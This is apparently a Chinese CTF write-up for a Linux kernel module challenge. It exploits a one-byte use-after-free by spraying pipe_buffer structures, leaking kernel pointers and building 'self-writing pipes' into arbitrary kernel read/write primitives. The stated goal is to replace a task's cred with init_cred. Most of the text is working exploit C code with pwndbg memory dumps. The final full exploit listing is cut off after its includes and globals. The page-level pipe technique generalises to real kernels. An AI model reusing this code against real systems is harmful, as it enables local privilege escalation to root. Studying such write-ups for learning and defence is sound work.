1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/bin/sh

mkdir /tmp
mount -t proc none /proc
mount -t sysfs none /sys
mount -t debugfs none /sys/kernel/debug
mount -t devtmpfs devtmpfs /dev
mount -t tmpfs none /tmp
mdev -s
echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"

insmod /test.ko
chmod 666 /dev/water
chmod 740 /flag
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
chmod 400 /proc/kallsyms

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /tmp

poweroff -d 0 -f

首先准备一份带调试符号的内核(注意:下面的命令安装的是 Ubuntu 6.2.0-36 的调试符号包,与题目使用的 6.4.0 内核版本并不一致,只能用于参考结构体布局;如需精确调试,应下载并编译 6.4.0 的源码)

1
sudo apt-get install linux-image-6.2.0-36-generic-dbgsym

漏洞分析

一次 UAF 并且只能控制第1字节:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
case 0x30u:
if ( !copy_from_user(&pointer, arg, 8LL) )
{
if ( delete_idx <= 0 && chunk )
{
kfree(chunk);
++delete_idx;
}
return 0LL;
}
return 0xFFFFFFFFFFFFFFEALL;
case 0x50u:
if ( !copy_from_user(&pointer, arg, 8LL) )
{
if ( edit_idx <= 0 && chunk && !copy_from_user(chunk, pointer.buf, 1LL) )
{
++edit_idx;
return 0LL;
}
return 0LL;
}
return 0xFFFFFFFFFFFFFFEALL;

入侵思路

具体的思路就是:

  • 申请堆 -> 释放 -> 堆喷内核结构体 -> 修改第1字节

需要利用的内核结构体就是 pipe_buffer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
 * One slot of a pipe's ring of buffers.
 * Size is 0x28 bytes on x86-64; the default 16-slot array is therefore
 * 0x280 bytes and is served from the 1 KiB kmalloc cache.
 */
struct pipe_buffer {
struct page *page; /* page holding the buffered data */
unsigned int offset, len; /* start of the data within the page, and its length in bytes */
const struct pipe_buf_operations *ops; /* callback table for this buffer */
unsigned int flags;
unsigned long private;
};

/*
 * Callback table referenced by pipe_buffer::ops. Every hook receives the
 * owning pipe_inode_info and the pipe_buffer it operates on.
 */
struct pipe_buf_operations {
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
bool (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};
  • 当我们创建一个管道时,在内核中会生成16个连续的 pipe_buffer 结构体,申请的内存总大小刚好会让内核从 kmalloc-1k 中取出一个 object
  • pipe 系统调用提供了 fcntl(F_SETPIPE_SZ) 让我们可以重新分配 pipe_buffer 并指定其数量

内核结构体 pipe_buffer 的第一个条目为 page,覆盖末尾字节就可能导致 page 重叠:

下面是堆喷 pipe_buffer 的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
memset(buf,0x31,0x200);
ioctl(fd,0x20,&buf);
ioctl(fd,0x30,&buf);

for(int i = 0; i < PIPE_NUM; i++){
if(pipe(pipe_list[i]) == -1){
errPrint("pipe");
}
}

for (int i = 0; i < PIPE_NUM; i++){
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 8) < 0){
/* 8 * pipe_buffer = 0x180 kmalloc-512 */
errPrint("fcntl");
}
}

for (int i = 0; i < PIPE_NUM; i++){
write(pipe_list[i][1], "AAAAAAAA", 8); // tag
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], "AAAAAAAA", 8);
write(pipe_list[i][1], "BBBBBBBB", 8);
}

memset(buf,0,0x200);
ioctl(fd,0x50,&buf); /* 覆盖pipe_buffer->page末尾字节 */

int victim_idx = -1;
int orig_idx = -1;
for (int i = 0; i < PIPE_NUM; i++){
char tag[0x10];
int nr;
memset(tag, 0, sizeof(tag));
read(pipe_list[i][0], tag, 8);
read(pipe_list[i][0], &nr, sizeof(int));
if (!strcmp(tag, "AAAAAAAA") && nr != i){
orig_idx = nr;
victim_idx = i;
printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",victim_idx, orig_idx);
}
}
if (orig_idx == -1 || victim_idx == -1){
errPrint("can't find");
}

调试信息如下:

1
2
3
4
5
6
pwndbg> telescope 0xffff888006e46600
00:0000│ rdi 0xffff888006e46600 —▸ 0xffffea00001bef80 ◂— 0xfffffc0000000 /* page */
01:00080xffff888006e46608 ◂— 0xc00000000 /* offset, len */
02:00100xffff888006e46610 —▸ 0xffffffff82246ec0 ◂— 0x0 /* ops */
03:00180xffff888006e46618 ◂— 0x10
04:00200xffff888006e46620 ◂— 0x0
1
2
3
4
5
6
pwndbg> telescope 0xffff888006e46600
00:0000│ r10 rdi-1 0xffff888006e46600 —▸ 0xffffea00001bef00 ◂— 0xfffffc0000000
01:00080xffff888006e46608 ◂— 0xc00000000
02:00100xffff888006e46610 —▸ 0xffffffff82246ec0 ◂— 0x0
03:00180xffff888006e46618 ◂— 0x10
04:00200xffff888006e46620 ◂— 0x0
  • 可以发现 page 末尾被覆盖
1
2
3
4
pwndbg> search -t qword 0xffffea00001bef00
Searching for value: b'\x00\xef\x1b\x00\x00\xea\xff\xff'
<pt> 0xffff888006e46600 0xffffea00001bef00
<pt> 0xffff888006e46a00 0xffffea00001bef00
  • 导致有两个 pipe_buffer 指向同一个 page

接下来就可以利用 UAF pipe_buffer 来泄露数据:

  • 释放 UAF pipe_buffer(4k的缓冲页也会被释放,释放之后数据不会清除仍然可读写)
  • 使用 fcntl(F_SETPIPE_SZ) 重新分配 pipe_buffer,部分的 pipe_buffer 就会被申请到之前我们释放的4k缓冲页上
  • 利用 UAF 对4k缓冲页进行读取就可以泄露地址

下面是测试样例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
struct pipe_buffer info_pipe_buf;
size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ / sizeof(struct pipe_buffer));

memset(buf,'p',sizeof(buf));
write(pipe_list[victim_idx][1], buf, SND_PIPE_BUF_SZ * 2 - 24 - 3 * sizeof(int));
close(pipe_list[orig_idx][0]); /* 释放其中一个pipe_buffer */
close(pipe_list[orig_idx][1]);

sleep(2);

puts("write down");

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx){
continue;
}
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0){
/* 2 * pipe_buffer = 0x60 kmalloc-96 */
errPrint("Fcntl Pipe");
}
}

memset(buf,0,sizeof(buf));
read(pipe_list[victim_idx][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
print_hex(buf,SND_PIPE_BUF_SZ - 8);
read(pipe_list[victim_idx][0], &info_pipe_buf, sizeof(info_pipe_buf));
print_hex((char*)&info_pipe_buf,sizeof(info_pipe_buf));

sleep(2);

printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n"
"\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",
info_pipe_buf.page, info_pipe_buf.ops);

这里的调试需要一些技巧,在第一个 sleep(2) 之前使用 search -s AAAABBBBBBBBpppppppp 查找:

1
2
3
pwndbg> search -s AAAABBBBBBBBpppppppp
Searching for value: 'AAAABBBBBBBBpppppppp'
<pt> 0xffff88800749c018 'AAAABBBBBBBBpppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp'
  • AAAAAAAABBBBBBBB 是之前写入的数据,其详细信息如下:
1
2
3
4
5
pwndbg> telescope 0xffff88800749c018-0x18
00:00000xffff88800749c000 ◂— 0x4141414141414141 ('AAAAAAAA')
01:00080xffff88800749c008 ◂— 0x300000003
02:00100xffff88800749c010 ◂— 0x4141414100000003
03:00180xffff88800749c018 ◂— 'AAAABBBBBBBBpppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp'
  • 这里的 0xffff88800749c000 就是被释放的4k缓冲页

在第二个 sleep(2) 之前再次打印 0xffff88800749c000

1
2
3
4
5
6
7
8
9
10
11
12
13
pwndbg> telescope 0xffff88800749c018-0x18
00:00000xffff88800749c000 —▸ 0xffffea00001d5f40 ◂— 0xfffffc0000000
01:00080xffff88800749c008 ◂— 0x180000000c /* '\x0c' */
02:00100xffff88800749c010 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
03:00180xffff88800749c018 ◂— 0x10
04:00200xffff88800749c020 ◂— 0x0
... ↓ 3 skipped
08:00400xffff88800749c040 ◂— 0x0
... ↓ 3 skipped
0c:00600xffff88800749c060 —▸ 0xffffea00001d5cc0 ◂— 0xfffffc0000000
0d:00680xffff88800749c068 ◂— 0x180000000c /* '\x0c' */
0e:00700xffff88800749c070 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
0f:00780xffff88800749c078 ◂— 0x10
  • 第一次 read(pipe_list[victim_idx][0]) 将会从 0xffff88800749c00c 开始,读取 84 字节,读到 0xffff88800749c060 为止
  • 第二次 read(pipe_list[victim_idx][0]) 就会泄露位于 0xffff88800749c060 的 pipe_buffer

泄露数据以后,我们就可以通过 write(pipe_list[victim_idx][1]) 来覆写 pipe_buffer,利用这一点可以构造自写管道:

在第一次 UAF 时我们获取到了 page 结构体的地址,而 page 结构体的大小固定为 0x40,试想若是我们可以不断地修改一个 pipe 的 page 指针,则我们便能完成对整个内存空间的任意读写

再次重新分配 pipe_buffer 结构体到第二级 page-level UAF 页面上,由于这张物理页面对应的 page 结构体的地址对我们而言是已知的,我们可以直接让这张页面上的 pipe_buffer 的 page 指针指向自身,从而直接完成对自身的修改

修改可控的 pipe_buffer2->page,即可完成二级 UAF:

用同样的方法将 pipe_buffer3 申请到4k缓冲页上,接着将 pipe_buffer3->page 覆盖为 pipe_buffer2->page

测试代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
info_pipe_buf.page = (struct page *)((size_t)info_pipe_buf.page + 0x40);
write(pipe_list[victim_idx][1], &info_pipe_buf, sizeof(info_pipe_buf));
puts("change pipe_buffer down");

sleep(2);

int snd_orig_idx = -1;
int snd_victim_idx = -1;
for (int i = 0; i < PIPE_NUM; i++){ /* 第二次堆喷 */
int nr;
if (i == orig_idx || i == victim_idx){
continue;
}
read(pipe_list[i][0], &nr, sizeof(int));
if (i < PIPE_NUM && i != nr){
snd_orig_idx = nr;
snd_victim_idx = i;
printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",snd_victim_idx, snd_orig_idx);
}
}

if (snd_orig_idx == -1 || snd_victim_idx == -1){
errPrint("can't find");
}

size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
struct pipe_buffer evil_pipe_buf;
struct page *page_ptr;

memset(buf,'k',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - 24 - 3 * sizeof(int));
close(pipe_list[snd_orig_idx][0]);
close(pipe_list[snd_orig_idx][1]);

puts("write down");
sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
continue;
}

if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0){
/* 4 * pipe_buffer = 0xc0 kmalloc-192 */
errPrint("Fcntl Pipe");
}
}

puts("fcntl down");
sleep(2);

evil_pipe_buf.page = info_pipe_buf.page;
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
evil_pipe_buf.ops = info_pipe_buf.ops;
evil_pipe_buf.flags = info_pipe_buf.flags;
evil_pipe_buf.private = info_pipe_buf.private;

write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));
puts("change pipe_buffer down");

调试信息如下:

1
2
3
00:00000xffff888002fd1aa0 —▸ 0xffffea00001d54c0 ◂— 0xfffffc0000000
01:00080xffff888002fd1aa8 ◂— 0x180000000c /* '\x0c' */
02:00100xffff888002fd1ab0 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
1
2
3
00:00000xffff888002fd1aa0 —▸ 0xffffea00001d5500 ◂— 0xfffffc0000000
01:00080xffff888002fd1aa8 ◂— 0x180000000c /* '\x0c' */
02:00100xffff888002fd1ab0 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
  • 修改 pipe_buffer 获取第二次 UAF
1
2
3
pwndbg> search -s AAAABBBBBBBBkkkkkkkk
Searching for value: 'AAAABBBBBBBBkkkkkkkk'
<pt> 0xffff888007554018 'AAAABBBBBBBBkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk'
  • 和之前的调试方法一样,先查找 write(pipe_list[snd_victim_idx][1]) 写入的位置
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
pwndbg> telescope 0xffff888007554018-0x18
00:00000xffff888007554000 —▸ 0xffffea00001d2440 ◂— 0xfffffc0000000
01:00080xffff888007554008 ◂— 0x1400000010
02:00100xffff888007554010 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
03:00180xffff888007554018 ◂— 0x10
04:00200xffff888007554020 ◂— 0x0
... ↓ 3 skipped
08:00400xffff888007554040 ◂— 0x0
... ↓ 7 skipped
10:00800xffff888007554080 ◂— 0x0
... ↓ 7 skipped
18:00c0│ 0xffff8880075540c0 —▸ 0xffffea00001d3cc0 ◂— 0xfffffc0000000
19:00c8│ 0xffff8880075540c8 ◂— 0x1400000010
1a:00d0│ 0xffff8880075540d0 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
1b:00d8│ 0xffff8880075540d8 ◂— 0x10
1c:00e00xffff8880075540e0 ◂— 0x0
... ↓ 3 skipped
20:01000xffff888007554100 ◂— 0x0
  • 起始地址为 0xffff888007554024,由 write(pipe_list[snd_victim_idx][1]) 写入 156 字节,因此下次覆盖的地址为 0xffff8880075540c0
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff888007554018-0x18
......
18:00c0│ 0xffff8880075540c0 —▸ 0xffffea00001d5500 ◂— 0xfffffc0000200
19:00c8│ 0xffff8880075540c8 ◂— 0xc0000000c0
1a:00d0│ 0xffff8880075540d0 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
1b:00d8│ 0xffff8880075540d8 ◂— 0x10
1c:00e00xffff8880075540e0 ◂— 0x0
... ↓ 3 skipped
20:01000xffff888007554100 ◂— 0x0
  • 覆盖位于 0xffff8880075540c0 的 pipe_buffer
  • 位于 0xffffea00001d5500 的 page 结构体会映射到 0xffff888007554000
  • 执行 write(pipe_list[target][1]) 时可以修改 pipe_buffer 本身,这相当于一个 self-writing pipe

通过如下代码可以构造另外两个 self-writing pipe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_2nd_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m%d\n",
self_2nd_pipe_idx);
break;
}
}

evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

memset(buf,'n',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
sleep(2);
write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

puts("change pipe_buffer down");
sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_3rd_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
"%d\n",
self_3rd_pipe_idx);
break;
}
}

evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

memset(buf,'m',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
sleep(2);
write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

puts("change pipe_buffer down");
sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx || i == self_3rd_pipe_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_4th_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
"%d\n",
self_4th_pipe_idx);
break;
}
}

调试信息如下:

1
2
3
4
5
pwndbg> search -t qword (0xffffea00001d5040+0x40)
Searching for value: b'\x80P\x1d\x00\x00\xea\xff\xff'
<pt> 0x7fffa821f280 0xffffea00001d5080
......
<pt> 0xffff8880075420c0 0xffffea00001d5080
  • 搜索 info_pipe_buf->page + 0x40(经过调试,最后一个就是目标)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pwndbg> telescope 0xffff8880075420c0
00:00000xffff8880075420c0 —▸ 0xffffea00001d5080 ◂— 0xfffffc0000200 /* self-writing pipe1 */
01:00080xffff8880075420c8 ◂— 0xb8000000c8
02:00100xffff8880075420d0 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂—0
03:00180xffff8880075420d8 ◂— 0x10
04:00200xffff8880075420e0 ◂— 0x0
05:00280xffff8880075420e8 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 2 skipped
08:00400xffff888007542100 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 7 skipped
10:00800xffff888007542140 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 7 skipped
18:00c0│ 0xffff888007542180 —▸ 0xffffea00001d4bc0 ◂— 0xfffffc0000000
19:00c8│ 0xffff888007542188 ◂— 0x1400000010
1a:00d0│ 0xffff888007542190 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂—0
1b:00d8│ 0xffff888007542198 ◂— 0x10
1c:00e00xffff8880075421a0 ◂— 0x0
1
2
3
4
5
18:00c0│  0xffff888007542180 —▸ 0xffffea00001d5080 ◂— 0xfffffc0000200 /* self-writing pipe2 */
19:00c8│ 0xffff888007542188 ◂— 0xc0000000c0
1a:00d0│ 0xffff888007542190 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
1b:00d8│ 0xffff888007542198 ◂— 0x10
1c:00e00xffff8880075421a0 ◂— 0x0
  • 覆盖位于 0xffff888007542180 的 pipe_buffer
1
2
3
4
5
6
7
8
9
1d:00e80xffff8880075421a8 ◂— 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
... ↓ 2 skipped
20:01000xffff8880075421c0 ◂— 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
... ↓ 7 skipped
28:01400xffff888007542200 ◂— 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
... ↓ 7 skipped
30:01800xffff888007542240 —▸ 0xffffea00001d4b00 ◂— 0xfffffc0000000
31:01880xffff888007542248 ◂— 0xc00000018
32:01900xffff888007542250 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
1
2
3
4
5
30:01800xffff888007542240 —▸ 0xffffea00001d5080 ◂— 0xfffffc0000200 /* self-writing pipe3 */
31:01880xffff888007542248 ◂— 0xc0000000c0
32:01900xffff888007542250 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
33:01980xffff888007542258 ◂— 0x10
34:01a0│ 0xffff888007542260 ◂— 0x0
  • 覆盖位于 0xffff888007542240 的 pipe_buffer

现在成功将3个 pipe_buffer 修改为 self-writing pipe(执行 write(pipe_list[target][1]) 可以修改 pipe_buffer 本身)

  • self-writing pipe1:偏移为 0xc0
  • self-writing pipe2:偏移为 0x180
  • self-writing pipe3:偏移为 0x240

之后就可以进行 RAA 和 WAA 了,这里我们使用三个管道:

  • self-writing pipe1:用以进行内存空间中的任意读写,我们通过修改其 page 指针完成
  • self-writing pipe2:用以修改 self-writing pipe3,使其写入的起始位置指向 self-writing pipe1
  • self-writing pipe3:用以修改 self-writing pipe1 和 self-writing pipe2,使得 self-writing pipe1 的 page 指针指向指定位置,self-writing pipe2 的写入起始位置指向 self-writing pipe3

这里可以篡改 pipe_buffer->offset 和 pipe_buffer->len 来移动 pipe 的读写起始位置,从而实现无限循环的读写,但是这两个变量会在完成读写操作后重新被赋值

在执行读写原语之前需要先执行如下的操作:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0xff0;

evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
evil_3rd_buf.len = 0;
sleep(2);
write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));
puts("change pipe_buffer down");
sleep(2);

evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
evil_4th_buf.len = 0;

调试信息如下:

1
2
3
4
5
6
7
10:00800xffff88800754a168 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 2 skipped
13:00980xffff88800754a180 —▸ 0xffffea00001d5280 ◂— 0xfffffc0000200
14:00a0│ 0xffff88800754a188 ◂— 0xb8000000c8
15:00a8│ 0xffff88800754a190 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
16:00b0│ 0xffff88800754a198 ◂— 0x10
17:00b8│ 0xffff88800754a1a0 ◂— 0x0
1
2
3
4
5
6
7
10:00800xffff88800754a168 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 2 skipped
13:00980xffff88800754a180 —▸ 0xffffea00001d5280 ◂— 0xfffffc0000200
14:00a0│ 0xffff88800754a188 ◂— 0x240
15:00a8│ 0xffff88800754a190 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
16:00b0│ 0xffff88800754a198 ◂— 0x10
17:00b8│ 0xffff88800754a1a0 ◂— 0x0
  • 偏移 0x240 处是 self-writing pipe3
1
2
3
4
2b:01580xffff88800754a240 —▸ 0xffffea00001d5280 ◂— 0xfffffc0000200
2c:01600xffff88800754a248 ◂— 0xe0000000c8
2d:01680xffff88800754a250 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
2e:01700xffff88800754a258 ◂— 0x10
  • 现在往 self-writing pipe2 中写入数据就会修改 self-writing pipe3

任意读写的原语如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
/*
 * Arbitrary-read primitive built on the three self-writing pipes.
 *
 * page_to_read: struct page pointer stored into the forged pipe_buffer.
 * dst:          destination buffer; the final read() asks for 0xfff bytes,
 *               so dst must be able to hold at least 0xfff bytes.
 *
 * The order of the write() calls matters and must not be changed.
 */
void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0x1ff8;
evil_2nd_buf.page = page_to_read;

/* Write-up: rewind pipe3's write position so that later writes through it overwrite pipe1's pipe_buffer. */
write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* Write-up: set pipe1->page = page_to_read. */
write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
/* Padding so that the next write() lands on pipe2's pipe_buffer. */
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));
/* Write-up: set pipe2->offset = 0x240 so that later writes through pipe2 overwrite pipe3. */
write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

read(pipe_list[self_2nd_pipe_idx][0], dst, 0xfff); /* arbitrary read */
}

/*
 * Arbitrary-write primitive built on the three self-writing pipes.
 *
 * page_to_write: struct page pointer stored into the forged pipe_buffer.
 * src, len:      data and byte count handed to the final write().
 *
 * The order of the write() calls matters and must not be changed.
 */
void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
evil_2nd_buf.page = page_to_write;
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0;

/* Write-up: rewind pipe3's write position so that later writes through it overwrite pipe1's pipe_buffer. */
write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* Write-up: set pipe1->page = page_to_write. */
write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
/* Padding so that the next write() lands on pipe2's pipe_buffer. */
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));
/* Write-up: set pipe2->offset = 0x240 so that later writes through pipe2 overwrite pipe3. */
write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

write(pipe_list[self_2nd_pipe_idx][1], src, len); /* arbitrary write */
}

利用 RAA 来扫描内存空间,查找可用的地址来计算内核偏移

接着可以利用 prctl(PR_SET_NAME) 重命名当前进程,然后利用 RAA 来查找 task_struct 的位置

最后利用 WAA 将 task_struct->cred 修改为 init_cred 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdint.h>
#include <ctype.h>

size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
size_t init_task, init_nsproxy, init_cred;

/*
 * Restrict the calling process to a single CPU and report which one.
 *
